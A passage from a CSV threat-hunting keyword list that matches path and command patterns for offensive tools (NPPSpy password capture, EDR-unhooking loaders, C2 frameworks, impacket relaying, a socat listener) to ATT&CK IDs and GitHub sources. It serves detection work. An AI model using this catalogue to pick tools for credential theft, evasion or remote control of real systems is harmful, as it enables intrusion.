as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*/noseyparker.git*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*/NotQuite0DayFriday/zip/trunk*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/nowsecure/dirtycow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,1,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*/nping-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/NPPSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,1,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/NPPSpy.exe*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,1,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/nps_payload.git*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z -*/nrpe-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nse_install/*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/nse-install.git*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/ntapphelpcachecontrol*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ntdissector.git*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,1,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*/ntdissector/*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*/ntdlll-unhooking-collection*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z -*/NTDLLReflection.git*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*/NtdllUnpatcher.git*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*/ntds_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/ntlm.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/ntlmquic*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*/NTLMRecon*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -*/NTLMRecon.git*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*/ntlmrecon/*.py*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*/NTLMRelay2Self*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,1,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z -*/ntlmrelayx/*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*/ntlmrelayx/*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*/ntlmscan.git*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -*/ntlmscan/*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -*/ntlmtransport.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*/ntlmutil.py*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z -*/ntlmutil.py*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z -*/ntlmv1.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ntp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ntp-monlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/NtQuerySystemInformation.md*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z -*/NtRemoteLoad.exe*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*/NtRemoteLoad.git*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*/NtRights/*,offensive_tool_keyword,NtRights,tool for adding privileges from the commandline,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/gtworek/PSBits/tree/master/NtRights,1,1,N/A,7,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/NtSetSystemInformation.md*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z -*/Nuages_Cli*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*/nuagesAPI.js*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*/nxc --help*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*/nysm bash*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*/nysm -dr socat TCP4-LISTEN*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*/nysm -r ssh *@*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*/nysm.bpf.c*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*/nysm.git*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,1,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*/o365recon*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*/oab-parse/mspack.*.dll*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/obfs3/obfs3.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/obfuscated_scripts/*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/Obfuscator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/Obfuscator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/obfuscator/obfuscator.*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*/octopus.asm*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*/Octopus.git*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*/octopusx64.asm*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*/OffensiveCSharp.git*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/OffensiveCSharp/*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/OffensiveNotion.git,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*/OffensiveNotion/agent*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*/OffensiveNotion/osxcross/target/bin*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*/OffensiveNotion/utils*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*/OG-Sadpanda/*,offensive_tool_keyword,cobaltstrike,.NET Assembly to Retrieve Outlook Calendar Details,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCalendar,1,1,N/A,10,10,13,1,2021-10-07T19:42:20Z,2021-10-07T17:11:46Z -*/Oh365UserFinder*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.,T1595 - T1592 - T1589 - T1591 - T1598,TA0004 - TA0005 - TA0010,N/A,N/A,Reconnaissance,https://github.com/dievus/Oh365UserFinder,1,1,N/A,N/A,5,468,84,2023-03-21T15:59:54Z,2021-11-16T22:59:04Z -*/OJ/gobuster*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/omg-payloads.git*,offensive_tool_keyword,omg-payloads,Official payload library for the O.MG line of products from Mischief Gadgets,T1200 - T1095 - T1059.006 - T1027,TA0010 - TA0011,N/A,N/A,Hardware,https://github.com/hak5/omg-payloads,1,1,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*/omp2-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/omp2-enum-targets.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/omron-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/On_Demand_C2/*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 